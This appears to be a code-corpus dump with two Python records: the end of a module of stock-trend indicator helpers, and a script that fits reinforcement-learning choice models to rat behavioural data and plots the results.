tmp = pd.concat([df['close']], axis=1, keys=['close'])\n tmp = compute_indicators(tmp, [\"trend_1d\"])\n tmp['shift_trend_1d'] = tmp['trend_1d'].shift(-1)\n tmp.dropna(inplace=True)\n\n tmp['true_positive'] = np.where((tmp['trend_1d'] == 1) & (tmp['shift_trend_1d'] == 1), 1, 0)\n tmp['true_negative'] = np.where((tmp['trend_1d'] == 0) & (tmp['shift_trend_1d'] == 0), 1, 0)\n tmp['false_positive'] = np.where((tmp['trend_1d'] == 1) & (tmp['shift_trend_1d'] == 0), 1, 0)\n tmp['false_negative'] = np.where((tmp['trend_1d'] == 0) & (tmp['shift_trend_1d'] == 1), 1, 0)\n\n # how many times the trend is up\n trend_counted = tmp['trend_1d'].value_counts(normalize=True)\n trend_ratio = 100 * trend_counted[1]\n\n # how many times trend today = trend tomorrow\n true_positive = 100*tmp['true_positive'].value_counts(normalize=True)[1]\n true_negative = 100*tmp['true_negative'].value_counts(normalize=True)[1]\n false_positive = 100*tmp['false_positive'].value_counts(normalize=True)[1]\n false_negative = 100*tmp['false_negative'].value_counts(normalize=True)[1]\n\n return trend_ratio, true_positive, true_negative, false_positive, false_negative\n\ndef get_stats_for_trend_up(df, n_forward_days):\n tmp = df.copy()\n\n indicator = \"trend_\"+str(n_forward_days)+\"d\"\n if indicator not in tmp.columns:\n tmp = compute_indicators(tmp, [indicator])\n\n # how many times the trend is up for d+n_forward_days\n trend_counted = tmp[indicator].value_counts(normalize=True)\n trend_ratio = 100 * trend_counted[1]\n\n return trend_ratio\n\ndef get_stats_on_trend_today_equals_trend_tomorrow(df):\n tmp = pd.concat([df['close']], axis=1, keys=['close'])\n tmp = compute_indicators(tmp, [\"trend_1d\"])\n tmp['shift_trend'] = tmp[\"trend_1d\"].shift(-1)\n tmp.dropna(inplace=True)\n\n tmp['true_positive'] = np.where((tmp[\"trend_1d\"] == 1) & (tmp['shift_trend'] == 1), 1, 0)\n tmp['true_negative'] = np.where((tmp[\"trend_1d\"] == 0) & (tmp['shift_trend'] == 0), 1, 0)\n tmp['false_positive'] = np.where((tmp[\"trend_1d\"] == 1) & (tmp['shift_trend'] == 0), 1, 0)\n tmp['false_negative'] = np.where((tmp[\"trend_1d\"] == 0) & (tmp['shift_trend'] == 1), 1, 0)\n\n # how many times trend today = trend tomorrow\n true_positive = 100*tmp['true_positive'].value_counts(normalize=True)[1]\n true_negative = 100*tmp['true_negative'].value_counts(normalize=True)[1]\n false_positive = 100*tmp['false_positive'].value_counts(normalize=True)[1]\n false_negative = 100*tmp['false_negative'].value_counts(normalize=True)[1]\n\n return true_positive, true_negative, false_positive, false_negative\n\ndef shift(df, indicator, shift):\n if isinstance(shift, str):\n shift = int(shift)\n \n df[indicator] = df[indicator].shift(shift)\n return df\n\ndef remove_missing_values(df):\n df['inf'] = 0\n for col in df.columns:\n df['inf'] = np.where((df[col] == np.inf) | (df[col] == -np.inf), 1, df['inf'])\n\n df = df.drop(df[df.inf == 1].index)\n df = df.drop(['inf'], axis=1)\n\n df.replace([np.inf, -np.inf], np.nan)\n # Drop the NaNs\n df.dropna(axis=0, how='any', inplace=True)\n\n return df\n\n\ndef remove_duplicates(df):\n df.drop_duplicates(inplace=True)\n return df\n", "repo_name": "cedfactory/fdp", "sub_path": "src/indicators.py", "file_name": "indicators.py", "file_ext": "py", "file_size_in_byte": 38151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "parse.parse", "line_number": 15, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 16, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 17, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "attribute"}, {"api_name": "stockstats.StockDataFrame.retype", "line_number": 167, "usage_type": "call"}, {"api_name": "stockstats.StockDataFrame", "line_number": 167, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 178, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 215, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 216, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 217, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 218, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 219, "usage_type": "call"}, {"api_name": "finta.TA.SMA", "line_number": 232, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 232, "usage_type": "name"}, {"api_name": "ta.trend.ema_indicator", "line_number": 241, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 241, "usage_type": "attribute"}, {"api_name": "ta.momentum.williams_r", "line_number": 249, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 249, "usage_type": "attribute"}, {"api_name": "ta.momentum.williams_r", "line_number": 264, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 264, "usage_type": "attribute"}, {"api_name": "finta.TA.WMA", "line_number": 278, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 278, "usage_type": "name"}, {"api_name": "finta.TA.SMA", "line_number": 282, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 282, "usage_type": "name"}, {"api_name": "finta.TA.EMA", "line_number": 286, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 286, "usage_type": "name"}, {"api_name": "finta.TA.WMA", "line_number": 290, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 290, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 294, "usage_type": "call"}, {"api_name": "finta.TA.BBANDS", "line_number": 307, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 307, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 308, "usage_type": "call"}, {"api_name": "ta.momentum.rsi", "line_number": 319, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 319, "usage_type": "attribute"}, {"api_name": "ta.momentum.stochrsi", "line_number": 330, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 332, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 332, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 334, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 334, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 349, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 349, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 372, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 372, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 374, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 374, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 376, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 376, "usage_type": "attribute"}, {"api_name": "ta.volatility.AverageTrueRange", "line_number": 400, "usage_type": "call"}, {"api_name": "ta.volatility", "line_number": 400, "usage_type": "attribute"}, {"api_name": "ta.momentum.awesome_oscillator", "line_number": 415, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 415, "usage_type": "attribute"}, {"api_name": "ta.momentum.awesome_oscillator", "line_number": 436, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 436, "usage_type": "attribute"}, {"api_name": "ta.volatility.BollingerBands", "line_number": 456, "usage_type": "call"}, {"api_name": "ta.volatility", "line_number": 456, "usage_type": "attribute"}, {"api_name": "ta.trend.sma_indicator", "line_number": 460, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 460, "usage_type": "attribute"}, {"api_name": "ta.trend.SMAIndicator", "line_number": 494, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 494, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 524, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 536, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 539, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 541, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 543, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 546, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 550, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 552, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 556, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 558, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 564, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 572, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 574, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 576, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 581, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 583, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 585, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 591, "usage_type": "call"}, {"api_name": "finta.TA.WILLIAMS", "line_number": 606, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 606, "usage_type": "name"}, {"api_name": "finta.TA.STOCH", "line_number": 609, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 609, "usage_type": "name"}, {"api_name": "finta.TA.STOCHD", "line_number": 612, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 612, "usage_type": "name"}, {"api_name": "finta.TA.ER", "line_number": 615, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 615, "usage_type": "name"}, {"api_name": "finta.TA.STC", "line_number": 618, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 618, "usage_type": "name"}, {"api_name": "finta.TA.ADX", "line_number": 621, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 621, "usage_type": "name"}, {"api_name": "finta.TA.ROC", "line_number": 624, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 624, "usage_type": "name"}, {"api_name": "finta.TA.MOM", "line_number": 627, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 627, "usage_type": "name"}, {"api_name": "ta.trend.ema_indicator", "line_number": 672, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 672, "usage_type": "attribute"}, {"api_name": "ta.trend.ema_indicator", "line_number": 673, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 673, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 691, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 695, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 699, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 701, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 705, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 706, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 707, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 708, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 712, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 713, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 714, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 721, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 722, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 723, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 724, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 749, "usage_type": "attribute"}, {"api_name": "numpy.datetime64", "line_number": 750, "usage_type": "attribute"}, {"api_name": "numpy.issubdtype", "line_number": 751, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 751, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 752, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 782, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 782, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 782, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 801, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 806, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 807, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 808, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 809, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 837, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 842, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 843, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 844, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 845, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 865, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 865, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 870, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 870, "usage_type": "attribute"}]}
+{"seq_id": "74087888168", "text": "import numpy as np\nimport numpy.random as random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport copy\nimport os\n\nclass participant():\n \"\"\"\n class to keep values of participant, predict selection, and update values\n according to reward for Single Context Experiments\n\n key attribute:\n self.values, list, in the form of [[V_AL, V_AR], [V_BL, V_BR]]. Only the\n two values related to the input sequence will be used. Based on the mode,\n two or four values will be upgraded.\n\n self.alphas, learning rate matrix, list, in the form of [[a_AL, a_AR], [a_BL, a_BR]],\n each alpha is a constant and not updated throughout the process.\n\n self.beta, the linear parameter of stockxxxxx, should be between 0 and 1?\n\n Since values and alphas are in the form of x_ij, where i/j = 0 for A/L, or 1 for B/R,\n the calculation can be made by using index of list, which, hopefully, will be easier.\n\n self.mode, 2 or 4, marking if only 2 values will be updated, or all four values will be\n updated, as suggested by different model\n\n self.values_history, list of all past values, so a list of list (which is of list again)\n \"\"\"\n\n def __init__(self, name=None, values=[[1,0],[0.5,0.5]], alphas=[[0.3,0.1],[0.1,0.3]], beta=1.0, mode=2):\n if name is None:\n self.name = \"participant\"\n else:\n self.name = str(name)\n\n self.values = values\n #print(\"Init Values: {v}\".format(v = self.values))\n self.values_history = [[[],[]],[[],[]]]\n self.alphas = alphas\n self.beta = beta\n\n self.possible_sequence = [\"A\", \"B\"]\n self.possible_response = [\"L\", \"R\"]\n\n assert mode in [1,2,4], \"Unknown mode, set mode to 1, 2 or 4!\"\n self.mode = mode\n\n def getProbabilities(self, sequence):\n # Calculate P_L and P_R from values\n V_L, V_R = self.values[self.possible_sequence.index(sequence)]\n Z = self.beta * (V_L - V_R)\n P_L = 1 / (1 + np.exp(-1 * Z))\n return P_L, 1-P_L\n\n def makeSelection(self, sequence):\n P_L, P_R = self.getProbabilities(sequence)\n if random.uniform(0, 1) <= P_L:\n return 0, \"L\"\n else:\n return 1, \"R\"\n\n def upgradeValues(self, sequence, response, reward):\n self.values_history[0][0].append(self.values[0][0])\n self.values_history[1][0].append(self.values[1][0])\n self.values_history[1][1].append(self.values[1][1])\n self.values_history[0][1].append(self.values[0][1])\n\n idx_seq = self.possible_sequence.index(sequence)\n idx_seq_re = abs(1 - idx_seq)\n idx_res = self.possible_response.index(response)\n idx_res_re = abs(1 - idx_res)\n\n self.values[idx_seq][idx_res] = self.values[idx_seq][idx_res] + \\\n self.alphas[idx_seq][idx_seq] * \\\n (reward - self.values[idx_seq][idx_res])\n\n if self.mode >= 2:\n self.values[idx_seq_re][idx_res] = self.values[idx_seq_re][idx_res] + \\\n self.alphas[idx_seq][idx_seq_re] * \\\n (reward - self.values[idx_seq_re][idx_res])\n\n if self.mode == 4:\n self.values[idx_seq][idx_res_re] = self.values[idx_seq][idx_res_re] + \\\n self.alphas[idx_seq][idx_seq] * \\\n (1 - reward - self.values[idx_seq][idx_res_re])\n\n self.values[idx_seq_re][idx_res_re] = self.values[idx_seq_re][idx_res_re] + \\\n self.alphas[idx_seq][idx_seq_re] * \\\n (1 - reward - self.values[idx_seq_re][idx_res_re])\n\n\nclass probabilityCalculator():\n def __init__(self, subject_no=9, mode=2, assist_alpha=True):\n data_filename = \"/media/zhemengwu/Gigantic Data/SingleContextSequence/Result/\" \\\n \"SingleContext_Rat\" + str(subject_no) + \".csv\"\n self.df = pd.read_csv(data_filename, sep=\",\")\n subject_name = data_filename.split(\"_\")[-1]\n self.subject_name = subject_name.split(\".\")[0]\n self.mode=mode\n self.subject_no = subject_no\n self.assist_alpha = assist_alpha\n\n def _calcEngine(self, alpha_starts = [[0,0],[0,0]], alpha_ends=[[1,1],[1,1]], step=0.1):\n result_df = pd.DataFrame(columns=[\"Alpha_00\",\"Alpha_01\",\"Alpha_10\",\"Alpha_11\",\"Ln_Likelyhood\"])\n name = self.subject_name\n alphas = [[1,2],[3,4]]\n for i in [0,1]:\n for j in [0,1]:\n alphas[i][j] = np.arange(np.max([alpha_starts[i][j],0]),\n np.min([1,alpha_ends[i][j]]), step)\n if not self.assist_alpha:\n alphas[0][1] = np.array([0])\n alphas[1][0] = np.array([0])\n print(\"alphas created\")\n\n for i, alpha_00 in enumerate(alphas[0][0]):\n print(\"Alpha_00: {v:.3f}, {i}/{j}\".format(v=alpha_00, i=i+1, j=len(alphas[0][0])))\n for alpha_01 in alphas[0][1]:\n for alpha_10 in alphas[1][0]:\n for alpha_11 in alphas[1][1]:\n alphas2use = [[alpha_00, alpha_01],[alpha_10, alpha_11]]\n probability_sum = 0.0\n\n if self.subject_no <= 16:\n p = participant(name=name, values=[[1,0],[1,0]],\n alphas=alphas2use, beta=1.0, mode=self.mode)\n else:\n p = participant(name=name, values=[[0,1],[0,1]],\n alphas=alphas2use, beta=1.0, mode=self.mode)\n\n #print(\"Alphas: {a}\".format(a=alphas2use))\n for i in range(len(self.df)):\n seq_trial = self.df[\"Sequence\"].iloc[i]\n res_trial = self.df[\"Response\"].iloc[i]\n reward = self.df[\"Correct\"].iloc[i]\n if res_trial in [\"L\", \"R\"]:\n prob_trial = p.getProbabilities(seq_trial)\n probability_sum = probability_sum + np.log(prob_trial[p.possible_response.index(res_trial)])\n p.upgradeValues(seq_trial, res_trial, reward)\n\n df_try = pd.DataFrame([[alpha_00, alpha_01, alpha_10, alpha_11, probability_sum]],\n columns=[\"Alpha_00\",\"Alpha_01\",\"Alpha_10\",\"Alpha_11\",\"Ln_Likelyhood\"])\n result_df = result_df.append(df_try)\n\n idx = result_df[\"Ln_Likelyhood\"] == result_df[\"Ln_Likelyhood\"].max()\n best_alphas = [[result_df[\"Alpha_00\"].loc[idx].values[0],result_df[\"Alpha_01\"].loc[idx].values[0]],\\\n [result_df[\"Alpha_10\"].loc[idx].values[0],result_df[\"Alpha_11\"].loc[idx].values[0]]]\n return best_alphas, result_df\n\n\nrootpath = \"/media/zhemengwu/Gigantic Data/SingleContextSequence/RL_Model\"\nif not os.path.exists(rootpath):\n os.mkdir(rootpath)\n\n#for subject_no in np.arange(12,13,1):\nsubject_all = np.arange(9, 25, 1)\nsubject_all = subject_all[subject_all != 18]\nfor subidx, subject_no in enumerate(subject_all):\n if not os.path.exists(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no))):\n os.mkdir(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no)))\n for mode in [1,2,3,4]:\n print(\"=\"*30)\n print(\"Subject {s}, {i}/15; mode: {m}\".format(s=subject_no, i=subidx+1, m=mode))\n if mode == 1:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=2, assist_alpha=False)\n elif mode == 3:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=4, assist_alpha=False)\n else:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=mode, assist_alpha=True)\n\n alpha_starts = [[0, 0], [0, 0]]\n alpha_ends = [[1, 1], [1, 1]]\n for i, step in enumerate([0.1,0.02,0.004,0.001]):\n print(\"Cycle {i}...\".format(i=i+1))\n best_alphas, result_df = Pcalculator._calcEngine(alpha_starts=alpha_starts, alpha_ends=alpha_ends, step=step)\n print(best_alphas)\n filename = os.path.join(rootpath,\n \"Rat_{s}\".format(s=subject_no),\n \"Rat{s}_Mode{m}_Cycle{i}.csv\".format(s=subject_no, m=mode, i=i+1))\n with open(filename, \"w\") as f:\n f.write(result_df.to_csv(index=False))\n alpha_starts = np.array(best_alphas) - step\n alpha_ends = np.array(best_alphas) + step\n\n\n###################################################33\n# Output results\ncolumns = [\"Subject\", \"N_Trials\",\n \"Mode1_LnLikelyhood\", \"Mode1_LnLikelyhood_Pertrial\",\n \"Mode1_Alpha_00\",\"Mode1_Alpha_01\", \"Mode1_Alpha_10\",\"Mode1_Alpha_11\",\n \"Mode2_LnLikelyhood\", \"Mode2_LnLikelyhood_Pertrial\",\n \"Mode2_Alpha_00\",\"Mode2_Alpha_01\", \"Mode2_Alpha_10\",\"Mode2_Alpha_11\",\n \"Mode3_LnLikelyhood\", \"Mode3_LnLikelyhood_Pertrial\",\n \"Mode3_Alpha_00\",\"Mode3_Alpha_01\", \"Mode3_Alpha_10\",\"Mode3_Alpha_11\",\n \"Mode4_LnLikelyhood\", \"Mode4_LnLikelyhood_Pertrial\",\n \"Mode4_Alpha_00\",\"Mode4_Alpha_01\", \"Mode4_Alpha_10\",\"Mode4_Alpha_11\"]\ndf_sum = pd.DataFrame(columns=columns)\n\nfor subject_no in subject_all:\n if not os.path.exists(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no))):\n os.mkdir(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no)))\n\n session_df_file = os.path.join(\"/media/zhemengwu/Gigantic Data/SingleContextSequence\",\n \"Result\", \"SingleContext_Rat{s}.csv\".format(s=subject_no))\n session_df = pd.read_csv(session_df_file, sep=\",\")\n session_df = session_df.loc[session_df[\"Response\"] != \"N\"]\n sub_name = \"Rat_{s}\".format(s=subject_no)\n n_trials = len(session_df)\n values = [sub_name, n_trials]\n\n for mode in [1,2,3,4]:\n print(\"=\" * 30)\n print(\"Subject {s}, mode: {m}\".format(s=subject_no, m=mode))\n\n # get mode2use and best-alphas\n if mode in [1,3]:\n mode2use = mode + 1\n else:\n mode2use = mode\n\n alpha_filename = os.path.join(rootpath,\n \"Rat_{s}\".format(s=subject_no),\n \"Rat{s}_Mode{m}_Cycle4.csv\".format(s=subject_no, m=mode))\n result_df = pd.read_csv(alpha_filename, sep=\",\")\n idx = result_df[\"Ln_Likelyhood\"] == result_df[\"Ln_Likelyhood\"].max()\n best_alphas = [[result_df[\"Alpha_00\"].loc[idx].median(), result_df[\"Alpha_01\"].loc[idx].median()], \\\n [result_df[\"Alpha_10\"].loc[idx].median(), result_df[\"Alpha_11\"].loc[idx].median()]]\n # apend values for df_sum\n values.append(result_df[\"Ln_Likelyhood\"].max())\n values.append(result_df[\"Ln_Likelyhood\"].max() / n_trials)\n values.append(result_df[\"Alpha_00\"].loc[idx].median())\n values.append(result_df[\"Alpha_01\"].loc[idx].median())\n values.append(result_df[\"Alpha_10\"].loc[idx].median())\n values.append(result_df[\"Alpha_11\"].loc[idx].median())\n\n # re-calculate values\n if subject_no <= 16:\n rat = participant(name=sub_name, values=[[1,0],[1,0]],\n alphas=best_alphas, beta=1.0, mode=mode2use)\n else:\n rat = participant(name=sub_name, values=[[0,1],[0,1]],\n alphas=best_alphas, beta=1.0, mode=mode2use)\n seqA_X, seqA_Y = [], []\n seqB_X, seqB_Y = [], []\n for i in range(len(session_df)):\n seq_trial = session_df[\"Sequence\"].iloc[i]\n res_trial = session_df[\"Response\"].iloc[i]\n reward = session_df[\"Correct\"].iloc[i]\n if res_trial in [\"L\", \"R\"]:\n rat.upgradeValues(seq_trial, res_trial, reward)\n if seq_trial == \"A\":\n seqA_X.append(i)\n seqA_Y.append(reward)\n else:\n seqB_X.append(i)\n seqB_Y.append(reward)\n # other parameter for plot\n x_plot = np.arange(len(session_df))\n\n # Sequence A Values\n fig = plt.figure(figsize=(12, 6), dpi=200)\n ax1 = fig.add_subplot(1, 1, 1)\n if subject_no <= 16:\n ax1.plot(x_plot, np.array(rat.values_history[0][0]), \"b\")\n ax1.plot(x_plot, np.array(rat.values_history[0][1]), \"r\")\n else:\n ax1.plot(x_plot, np.array(rat.values_history[0][0]), \"r\")\n ax1.plot(x_plot, np.array(rat.values_history[0][1]), \"b\")\n colormap = [\"r\", \"b\"]\n shapemap = [\"x\", \"o\"]\n for x, y in zip(seqA_X, seqA_Y):\n ax1.scatter(x, (y-0.5) * 1.05 + 0.5, color=colormap[y], marker=shapemap[y], s=5)\n ax1.set_xlabel(\"Sequences A Values\", fontsize=12)\n ax1.set_ylim([-0.03,1.03])\n ax1.set_xlim([0, n_trials])\n ax1.grid()\n filename = os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no), \"SequenceA_Mode{m}.png\".format(m=mode))\n plt.savefig(filename)\n plt.close(fig)\n\n # Sequence B Values\n fig = plt.figure(figsize=(12, 6), dpi=200)\n ax2 = fig.add_subplot(1, 1, 1)\n if subject_no <= 16:\n ax2.plot(x_plot, np.array(rat.values_history[1][0]), \"r\")\n ax2.plot(x_plot, np.array(rat.values_history[1][1]), \"b\")\n else:\n ax2.plot(x_plot, np.array(rat.values_history[1][0]), \"b\")\n ax2.plot(x_plot, np.array(rat.values_history[1][1]), \"r\")\n colormap = [\"r\", \"b\"]\n shapemap = [\"x\", \"o\"]\n for x, y in zip(seqB_X, seqB_Y):\n ax2.scatter(x, (y-0.5) * 1.05 + 0.5, color=colormap[y], marker=shapemap[y], s=5)\n ax2.set_xlabel(\"Sequences B Values\", fontsize=12)\n ax2.set_ylim([-0.03,1.03])\n ax2.set_xlim([0, n_trials])\n ax2.grid()\n filename = os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no), \"SequenceB_Mode{m}.png\".format(m=mode))\n plt.savefig(filename)\n plt.close(fig)\n\n df2add = pd.DataFrame([values], columns=columns)\n df_sum = df_sum.append(df2add, ignore_index=True)\n\nwith open(os.path.join(rootpath, \"Summary.csv\"), \"w\") as f:\n f.write(df_sum.to_csv(index=False))\n\n\n\n\n\n", "repo_name": "HaoyuFan-DIB/RatChoice", "sub_path": "RL_Model/RL_Model.py", "file_name": "RL_Model.py", "file_ext": "py", "file_size_in_byte": 14389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.exp", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 161, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 202, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, 